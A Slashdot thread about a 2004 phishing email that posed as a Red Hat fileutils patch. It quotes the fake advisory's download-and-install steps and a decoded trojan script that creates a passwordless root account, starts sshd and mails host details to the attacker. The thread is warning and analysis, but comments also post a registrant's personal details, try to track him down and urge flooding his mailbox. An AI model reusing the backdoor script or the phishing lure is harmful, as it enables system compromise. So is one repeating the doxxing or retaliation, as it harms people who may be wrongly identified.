Beware 'Fedora-Redhat' Fake Security Alert
rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.
Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat
A complete revision history is at the end of this file.
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.
The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:
* First download the patch from the Stanford RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
* ./inst
Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Copyright © 2004 Red Hat, Inc. All rights reserved.
Adopting dumb users had to bring the ones exploiting the stupidity with them. Even though running as a non-admin should help against these things, there is no cure against security holes between the chair and the keyboard.
The system had the verbosity of HTML combined with all the readability of compiled assembly viewed as bitmap images
It's phishing, it happens on every platform and requires the user to do something they think is in their best interest. Nothing new.
I am downloading the file to a Knoppix box, and will then disconnect the ethernet cord, run the code, and report back.
Stay tuned.
Don't most Fedora people use yum to keep their systems up to date? I don't think many Fedora/Red Hat admins would fall for this.
[Querying whois.internic.net]
[Redirected to whois.melbourneit.com]
[Querying whois.melbourneit.com]
[whois.melbourneit.com]
Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES
Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533
Admin Fax............
Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address.........
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech Email........... domain.tech@YAHOO-INC.COM
Tech Phone........... +1.6198813096
Tech Fax............. +1.6198813010
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com
Oh, no! You have walked into the slavering fangs of a lurking grue!
Why not just use the real link and slashdot their site into oblivion!
Red Hat's reply to this issue is pretty straight-forward. They've already taken all of the steps to properly sign their real updates, and this should stand out as a fake because it lacks all of those digital signatures.
However, what good is that against Joe User who falls for the bait and thinks the e-mail is authentic because they believe everything they read on their screen? They don't know to check for the "security seals", so they don't see any red flags indicating that this is bogus.
It's something in info security that disconnects when dealing with average users. They don't know what to look for, and therefore the absence of those marks is not as alarming to them as it is for us... a little something that needs to be cleaned up before Linux is ready for desktop primetime.
It seems to me that most people using any version of Linux will not fall victim to these sorts of things. I would expect something like this to work for the majority of Windows users, but as the audience of Linux is mostly tech-savvy, I can't see this becoming a problem. The problem is going to be when larger groups of desktop users make the jump to Linux. What can be done to prevent this from happening in the future? What failsafes can be built into Linux to prevent people with less than average PC skills from destroying their systems?
Those who can make you believe absurdities can make you commit atrocities. - Voltaire
Running untrusted code can result in system compromise.
Everyone checks the gpg signatures right?
Now if, each time someone tries this sort of thing, their server got posted here on slashdot, we could actually do something good with the slashdot effect and put their server up in smoke before much damage is done. :-D
OK, we all know no Linux Guru will ever fall for this kind of stupid trick.
But imagine a world where Linux overwhelms Microsoft as the #1 desktop OS. Millions of Moms and Pops everywhere, using Linux. Who will they trust for their "updates"? I know for sure lots of them would fall for this particular trick, and it's one of the first times we see this. Lots of distros, lots of sources, lots of patches, major confusion.
Question (as I don't use Linux yet): Do some of the major distros (Redhat, etc) have a webservice for updates, akin to windowsupdate.com? I sure hope so; it's essential for further desktop market share increase.
Eureka Science News - automatically updated
or better yet, if Microsoft paid the Yankee group to do it for them, and then did an "independent study" on it.
Why post the text instead of having the /. crowd flood their server to see what they've put up there? Potentially that could bring the server offline and cost them a bundle for a great two-sided effect (OK, the latter is not that cool if it's just some rooted box, but at least it would prevent anyone being affected if it was /.'ed to hell).
Entranced by anime since late summer 2001 and loving it ^_^
I'm sure glad I'm using windows!
Either it is malicious or not.
Don't they know ?
If it does; explain what it does and how to mitigate the damage.
If it does not; let people know so emotional energy can be use elsewhere.
What's the definition of 'malicious code' anyway?
Presumably any code you don't want running is malicious.
Creating a temp file would be a malicious use of disk space, etc.
"Anybody running RedHat and Fedora are strongly adviced to apply this patch!"
Why can't scammers ever spell? Someone send them a copy of Strong Bad's "Rhythm 'n' Grammar", quick!
More like... nerdular nerdence!
Identifying the system. This may take up to 2 minutes. Please wait... /etc/ssh/ssh_host_key /etc/ssh/ssh_host_rsa_key /etc/ssh/ssh_host_dsa_key
adduser: No more than two names.
passwd: Unknown user bash
Could not load host key:
Could not load host key:
Could not load host key:
Disabling protocol version 1. Could not load host key.
Disabling protocol version 2. Could not load host key.
sshd: no hostkeys available -- exiting.
System looks OK. Proceeding to next step.
Patching "ls": ###########
Patching "mkdir": ##########
System updated and secured successfully. You may erase these files.
Dammit why does Linux have to be so complicated, I mean damn you have to compile your own viruses and everything!!!!
Debian has been weeding out incompetent users with its "impossible to use" installer for years.
It keeps the "Mandrake Crew" off of the debian-users lists.
If your mail client checked From: addresses against SPF records in DNS, you'd know immediately this was a hoax. Redhat.com fortunately publishes SPF records and -- score one for SPF -- they can be used to identify with 100% accuracy that the mail is not legitimate.
How can you get your mail client to check SPF records automatically? Download the Thunderbird SPF Extension.
(Disclosure: I wrote the plugin. :) )
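As an added illustration of the check the comment above describes (this is not the poster's plugin, nor any Red Hat code): a minimal SPF evaluator that handles the ip4/ip6 mechanisms and the all mechanism, run against constructed records instead of real DNS TXT lookups. The redhat.com record below is an assumption made up for the example; the real published record is not reproduced here. One caveat worth knowing: SPF is defined against the envelope MAIL FROM (and HELO) domain, not the From: header a user sees, so a client-side check against From: is a heuristic rather than the protocol proper.

```python
import ipaddress

# Constructed stand-in for DNS TXT lookups. Both records are ASSUMPTIONS
# for this example; they are not the real SPF records of these domains.
FAKE_DNS_TXT = {
    "redhat.com": "v=spf1 ip4:66.187.233.0/24 ip4:66.187.224.0/24 -all",
    "example.org": "v=spf1 ip4:192.0.2.0/24 ~all",
}

# Qualifier prefix -> SPF result when the mechanism matches.
RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def lookup_spf(domain):
    """Return the v=spf1 record for a domain from the constructed table, or None."""
    record = FAKE_DNS_TXT.get(domain.lower())
    if record and record.startswith("v=spf1"):
        return record
    return None


def check_spf(sender_ip, mail_from_domain, lookup=lookup_spf):
    """Evaluate sender_ip against the SPF record of mail_from_domain.

    Supports only ip4:, ip6: and all mechanisms (no include:, a, mx or redirect=),
    which is enough to show how a hard '-all' rejects a spoofed sender.
    Returns one of: 'pass', 'fail', 'softfail', 'neutral', 'none'.
    """
    record = lookup(mail_from_domain)
    if record is None:
        return "none"  # domain publishes no SPF; nothing to decide on
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qualifier = "+"  # mechanisms default to '+' (pass) when unqualified
        if term[0] in RESULT:
            qualifier, term = term[0], term[1:]
        if term == "all":
            return RESULT[qualifier]
        if term.startswith(("ip4:", "ip6:")):
            net = ipaddress.ip_network(term[4:], strict=False)
            if ip.version == net.version and ip in net:
                return RESULT[qualifier]
    # Record ended without an 'all' mechanism: RFC default is neutral.
    return "neutral"


if __name__ == "__main__":
    # A host in the fake fedora-redhat.com netblock claiming to be redhat.com.
    print(check_spf("66.218.79.149", "redhat.com"))   # -> fail
    print(check_spf("66.187.233.10", "redhat.com"))   # -> pass
    print(check_spf("1.2.3.4", "fedora-redhat.com"))  # -> none
```

The interesting line for this story is the first one: a message whose envelope sender claims redhat.com but arrives from an address outside the published ranges hits `-all` and fails outright, which is exactly the signal a receiving MTA or client plugin can act on.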
But I am running SUSE! Am I adviced in similar fashion? Perhaps I too should applying patch lest SUSE found vulnerability also? Thankyou to www.fedora-redhat.com for adviced me in this helpful manner against remote attackers!
It would appear that the author of this code was a bit foolish. The code appears to try to add a user, then start an sshd backdoor, all during the time that it's supposedly "Identifying the system". But it fails and spits out a bunch of errors! I will post the code shortly.
Ok, that was a horrible misspelling of malicious :|
However, the IP block clearly belongs to Yahoo, whois 66.218.75.0 lists contact point netblockadmin@yahoo-inc.com
Anybody feel like dropping them a line to tell them they're hosting trojaners?
All's true that is mistrusted
Shut it down! Someone paid you to host this, pass that information along to the authorities.
I've tried to post the code here, but am repeatedly blocked by the Lameness Filter. I have posted the C file to my server. It's safe to view, as long as you don't go trying to compile and run it! :-p
View inst.c
From shc's manpage:
Definitely doing something then, at least viewing the parent post.
Here is what it does.
Dogg
The source code for inst.c seems to be very similar to the "Klik client" code from http://klik.berlios.de/client/klik-0.1.3.c
Everything but the comments at the top of the page, and the shellcode, is pretty-much identical.
Klik looks to be a "KDE-based Live Installer for Knoppix".
Still looking....
Red.
Looks like I misinterpreted the code. The rc4 stuff is part of the shc "script compiler" output that decodes the actual shell script. fileutils-patch.bin is just a mis-named redhat RPM that inst doesn't appear to use at all.
0 1 - just my two bits
The funniest part is that the code (a shell script compiled into C code, then into a binary, to obfuscate its purpose) failed miserably on my test systems, both Knoppix AND Fedora Core 2. It spat out a bunch of errors which completely revealed the fact that it was trying to add a user, start sshd, etc. C'mon, if you're gonna terrorize the Linux world, at least do it right!
Going to the site, The use of Redhat logo and Redhat name itself is in clear violation of the trademark guidelines. I am guessing it will not be too long before this site and domain is taken down.
My question is: can these a**holes get away with using the 'fedora' name instead?
ps. I am not affiliated with RH in any way.
Copyright © 2004 All rights reserved. Redhat is a registered trademark of Redhat (only). No soup for you.
The script is encoded into the text variable in the source. The key part of the script is this:
echo "Inca un root frate belea: " >> /tmp/mama
adduser -g 0 -u 0 -o bash >> /tmp/mama
passwd -d bash >> /tmp/mama
ifconfig >> /tmp/mama
uname -a >> /tmp/mama
uptime >> /tmp/mama
sshd >> /tmp/mama
echo "user bash stii tu" >> /tmp/mama
cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
rm -rf /tmp/mama
(I'd post the whole script but the lameness filter won't let me)
Create a user named bash, no password
grab the ip and uptime, start ssh
mail the results
- MbM
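The persistence trick in the decoded script is an extra account with uid 0 and an empty password (adduser -g 0 -u 0 -o bash; passwd -d bash). As an added example, not code from the post or from the trojan, here is a small audit that finds both symptoms in passwd/shadow data. The sample file contents are constructed to look like a box after the script ran; the hashes are placeholders.

```python
# Constructed sample files: what /etc/passwd and /etc/shadow might look like
# after "adduser -g 0 -u 0 -o bash" and "passwd -d bash". Hashes are fake.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
alice:x:500:500:Alice:/home/alice:/bin/bash
bash:x:0:0::/home/bash:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$1$abcdefgh$placeholderhash.:12700:0:99999:7:::
daemon:*:12700:0:99999:7:::
alice:$1$ijklmnop$placeholderhash.:12700:0:99999:7:::
bash::12700:0:99999:7:::
"""


def parse_colon_file(text):
    """Split passwd/shadow-style text into lists of fields, skipping blanks and comments."""
    rows = []
    for line in text.splitlines():
        line = line.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        rows.append(line.split(":"))
    return rows


def audit_accounts(passwd_text, shadow_text):
    """Return (account, finding) pairs for uid-0 aliases and passwordless logins.

    A uid-0 account other than root is a classic backdoor: it has root's
    privileges but shows up under a different name in logs and 'w' output.
    An empty password field (in passwd, or in shadow when passwd says 'x')
    lets anyone log in as that account, e.g. over the sshd the script starts.
    """
    shadow_pw = {row[0]: row[1] for row in parse_colon_file(shadow_text) if len(row) >= 2}
    findings = []
    for row in parse_colon_file(passwd_text):
        if len(row) < 7:
            continue  # malformed line; a real audit would flag it
        name, pw, uid = row[0], row[1], row[2]
        if uid == "0" and name != "root":
            findings.append((name, "uid-0 alias"))
        effective_pw = shadow_pw.get(name, pw) if pw == "x" else pw
        if effective_pw == "":
            findings.append((name, "empty password"))
    return findings


def audit_host(passwd_path="/etc/passwd", shadow_path="/etc/shadow"):
    """Run the audit on a live host (needs root to read shadow)."""
    with open(passwd_path) as p, open(shadow_path) as s:
        return audit_accounts(p.read(), s.read())


if __name__ == "__main__":
    for account, finding in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{account}: {finding}")  # -> bash: uid-0 alias / bash: empty password
```

On a real host pair this with a check for an sshd listening that was not started by init, since the script launches sshd directly after adding the account.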
Everyone should email yahoo via netblockadmin@yahoo-inc.com and ask them to take the site down.
>md5sum fileutils-1.0.6.patch.tar.gz
68349c219d941209af8f7c968b89d622 *fileutils-1.0.6.patch.tar.gz
So you can be sure you're getting the real fake patch.
The shareholder is always right.
The question begging to be asked is why is this site still alive?
heh, maybe it won't be for long with the /. effect!
The race isn't always to the swift... but that's the way to bet!
Because sending loads of traffic to a site that is actively trying to get a trojan onto unsuspecting boxes seems like a pretty bad idea.
Apart from those that might click through without bothering to RTFA, and mistakenly think that it's a legit patch, there are also all those browser exploits (such as the Microsoft jpeg exploit) that could also be waiting on the site for unpatched systems.
Here's what I do: Bitty Browser & Andromeda
Whoever is behind this certainly seems to be doing a very sloppy job of it. Yahoo, Melbourne IT, Stanford, hosting at "everyone.net"; hardly a who's who of dodgy companies and "bullet proof" service providers, is it? Frankly, I'm expecting to be reading a Slashdot story about a bust by the end of the week, and that's being generous.
UNIX? They're not even circumcised! Savages!
But slashdotting the misused domain will let the company hosting the fraudulent crap know that they should vet their users a bit more carefully, and let them know that they're hosting a *BIG* problem and may need to review their overall customer contracts to prevent this in the future. It also helps give the company incentive to prosecute, or at least sue, the jerk who set them up for this.
If the Antivirus companies were responsible, they'd have done a better job.
If Microsoft was responsible, they wouldn't have included any source code.
If SCO was responsible, they'd have included sourcecode and then sued you for running it
All things taken into consideration, I'm with 'other' on this one
Ripping an new rectum in the fabric of spacetime.
(Mind you, I'm no better. First time I got a computer virus, when I was running MSDOS, my first reaction was to run a binary diff against a clean version of the file, and disassemble the result to see what it did. Do you know if there's a cure for this?)
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.
Malike Bamiyi wanted my assistance.
We know the email address that the trojan sends it's feedback to. Rather than attempting to slashdot the site, why don't we just flood the email box. It'll eat bandwidth, dilute any useful data the SOB who set this up will get, and maybe stop future dipshit admins from getting whacked. So... anybody want to work out the format of a message telling whatever lameass came up with this scheme that microsoft.com just got rooted? :-)
// Dumps core here
To : abuse@everyone.net,
abuse@above.net
Subject : malware using your netblock to propagate
http://it.slashdot.org/article.pl?sid=04/10/24/2352234&tid=172&tid=110&tid=218&tid=106
The story reports on a linux trojan that, after installing, emails a
report back to root@addlebrain.com. The MX record for addlebrain.com
points to sitemail.everyone.net. It would reduce the effect of this if
you could shut down that email account.
Better yet, you should gather the list of infected IPs and then inform
the owners.
Damian Menscher
--
-=#| Physics Grad Student & SysAdmin @ U Illinois Urbana-Champaign |#=-
-=#| 488 LLP, 1110 W. Green St, Urbana, IL 61801 Ofc:(217)333-0038 |#=-
-=#| 4602 Beckman, VMIL/MS, Imaging Technology Group:(217)244-3074 |#=-
-=#| <menscher@uiuc.edu> www.uiuc.edu/~menscher/ Fax:(217)333-9819 |#=-
-=#| The above opinions are not necessarily those of my employers. |#=-
Red Hat should simply rename the file on their site, change the links to it, and then replace it with a "THIS IS FRAUD" PNG.
TO BUY A NEW CAR WOULD MAKE YOU SEXUALLY ATTRACTIVE.
Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.
If you do, make sure the IP addresses are of .mil and .gov sites. :o)
I knew, my habit of not updating my systems would help me someday.
Python script to convert photos into "artsy" portraits: http://p2pbridge.sf.net/pyPortrait/
without bothering to RTFA, and mistakenly think that it's a legit patch,
Though it's a shitty thing for someone to be doing, as it is anytime somebody tries to get a virus or exploit going, it is at the same time a very amusing example of one. Think about it, the concept of this one has a certain beauty: It is meant to be activated while the machine is under the control of someone who should know better. There is no clueless-luser-carelessly-clicking that can be done here, you've got to know some basic geek stuff to go get the 'patch', unpack it, install it.. You've got to expend a reasonable amount of effort to get nailed by this thing. That is both its curse and its beauty.
I confirm, it's Romanian, I translated in other post, nothing important, the writer is an idiot.
"It is our choices, Harry, that show what we truly are, far more than our abilities." -- Prof. Dumbledore
here is a slashdot user who has translated it.
I don't claim I know more than I know, and if you know you know more than I know, then by all means, let me know.
It appears the human body maintains a temperature of approximately 98.6'F... lemmie shove a thermometer up my @ss, and I'll report back my findings here.
I looked at the whois... fedora-redhat.com reported:
Raymond Jackson
224 Cedar Avenue
New York, NY 95301.
209 899-4533 However, 95301 is an Atwater, CA zip code.
So, I looked up Raymond Jackson in Atwater. What did I find?
Raymond Jackson
224 Cedar Avenue
Atwater, CA 95301
209 358 8510.
Looks like he did a crappy job of disguising his identity. Go get him!!!
host fedora-redhat.com
fedora-redhat.com has address 66.218.79.149
fedora-redhat.com has address 66.218.79.155
fedora-redhat.com has address 66.218.79.147
fedora-redhat.com has address 66.218.79.148
whois 66.218.79.149
OrgName: Yahoo!
OrgID: YAOO
Address: 701 First Avenue
City: Sunnyvale
StateProv: CA
PostalCode: 94089
Country: US
NetRange: 66.218.64.0 - 66.218.95.255
CIDR: 66.218.64.0/19
Trying to DDoS Yahoo won't get you very far : )
Lawyers, MBA's, RIAA? A jedi fears not these things!
Someone on the full-disclosure has posted a good analysis of what this is. Have a look at this thread.
Not if you run your own mail server(s).
As a test of why this is a BAD IDEA, send a message from your servers to an outside account. Read the full headers. Notice helpful little things there including IP addresses?
(Yes, you can send the message through your own servers to another account...though it might make reading the headers even more confusing if you've never done it before.)
A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
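The point above, that mail sent through your own server carries your address in the Received: chain, cuts both ways: the same headers are how an incident responder traces where a phishing run like this one actually came from. As an added example (not from the comment or any of the posters), this walks the Received: headers of a constructed message and pulls out the relay IPs, newest hop first. The message, hostnames and addresses are all made up for the example and use documentation ranges.

```python
import re
from email import message_from_string

# Constructed message: two Received: hops, with a From: claiming to be Red Hat.
# All hostnames and IPs are invented for this example.
SAMPLE_MESSAGE = """\
Received: from mx.example.org (mx.example.org [192.0.2.10])
\tby mail.example.net (Postfix) with ESMTP id 1A2B3C;
\tMon, 25 Oct 2004 01:32:00 +0000
Received: from fedora-redhat.com (dsl-23.example-isp.invalid [198.51.100.23])
\tby mx.example.org (Postfix) with SMTP id 4D5E6F;
\tMon, 25 Oct 2004 01:31:50 +0000
From: RedHat Security Team <security@redhat.com>
To: rixdaffy@example.net
Subject: Critical fileutils update

Apply the patch immediately.
"""

# IPv4 literal in square brackets, as MTAs write the connecting peer address.
RECEIVED_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def received_chain(raw_message):
    """Return the peer IP from each Received: header, in header order.

    Headers are prepended by each relay, so index 0 is the hop closest to the
    recipient and the last entry is the hop closest to the sender.
    """
    msg = message_from_string(raw_message)
    hops = []
    for header in msg.get_all("Received", []):
        match = RECEIVED_IP.search(header)
        hops.append(match.group(1) if match else None)
    return hops


def origin_ip(raw_message):
    """Best-effort originating IP: the peer recorded by the last Received: header.

    Only the hops added by relays you trust are reliable; a sender can forge
    earlier Received: lines, so treat the bottom of the chain with suspicion.
    """
    hops = received_chain(raw_message)
    return hops[-1] if hops else None


def claimed_from_domain(raw_message):
    """Domain part of the From: header, i.e. what the recipient sees."""
    msg = message_from_string(raw_message)
    sender = msg.get("From", "")
    match = re.search(r"@([\w.-]+)", sender)
    return match.group(1).lower() if match else None


if __name__ == "__main__":
    print(received_chain(SAMPLE_MESSAGE))    # -> ['192.0.2.10', '198.51.100.23']
    print(origin_ip(SAMPLE_MESSAGE))         # -> 198.51.100.23
    print(claimed_from_domain(SAMPLE_MESSAGE))  # -> redhat.com
```

The origin hop here is a consumer DSL address while the From: claims redhat.com; that mismatch is the same signal the SPF discussion earlier in the thread is about, just read by hand.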
Try:
These are more than good enough.
I prefer the "u" in honour as it seems to be missing these days.
I can just imagine...
"Attached is a sexy picture of Anna Kournikova.
To view the picture, simply:
1) save the attachment
2) su -
3) tar -xjf anna.tar.gz
4) ./configure
5) make
6) make install
7) anna"
Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary.
This is an unfortunate reality today. Back in my day, the only way to be a real Linux guru was to compile and build your system from scratch using a dev box.
Nowadays, any average person can easily install Linux and instantly become "31337". Today's typical Linux user has no idea what half the files on his system do, or where they came from. Unfortunately, the majority of you with moderator points fall into this category so my post is doomed!
I would advise those who are new to Linux to visit the Linux From Scratch website and set aside a weekend of learning. There is no better method for gaining useful knowledge regarding the reduction of hard drive clutter and increasing optimization, and security.
This is an honor virus. Please forward to all your friends, then format your hard drive(s). Thank you.
I feel fantastic, and I'm still alive.
We're supposed to believe this?
This is a buggy honor virus. Please format your hard drive(s) and then pass it to all your friends.
Thank you.
Free Software: Like love, it grows best when given away.
Been there, done that:
<root@addlebrain.com>: host sitemail.everyone.net[216.200.145.51] said: 554
Recipient Rejected: Not accepting mail for this account : Account
terminated due to violation of user agreement
...the system works!
Agreed, but one needs to be very, very careful as to any assumptions about exactly which system it was that worked.
The first order of business is to somehow, anyhow, stem the tide.
The second is to be very wary of jumping to any conclusions. If I'm going to do something bad that requires a name and address on it, I will use your name and address not mine.
Third, it is probably better if the reactive responses are not exactly predictable. If your enemy has extremely predictable responses, you can defeat his superior forces with inferior forces.
Judging from this and the responses to this, I'd say that Open Source is in very good shape to take care of itself. Even better than a coordinated defense is being able to defend regardless of coordination or the lack thereof. Counting vulnerabilities is an extremely bad metric, particularly considering that Red Hat, etc knows that if you actually want people to patch their systems, you never under any circumstances downplay the potential severity.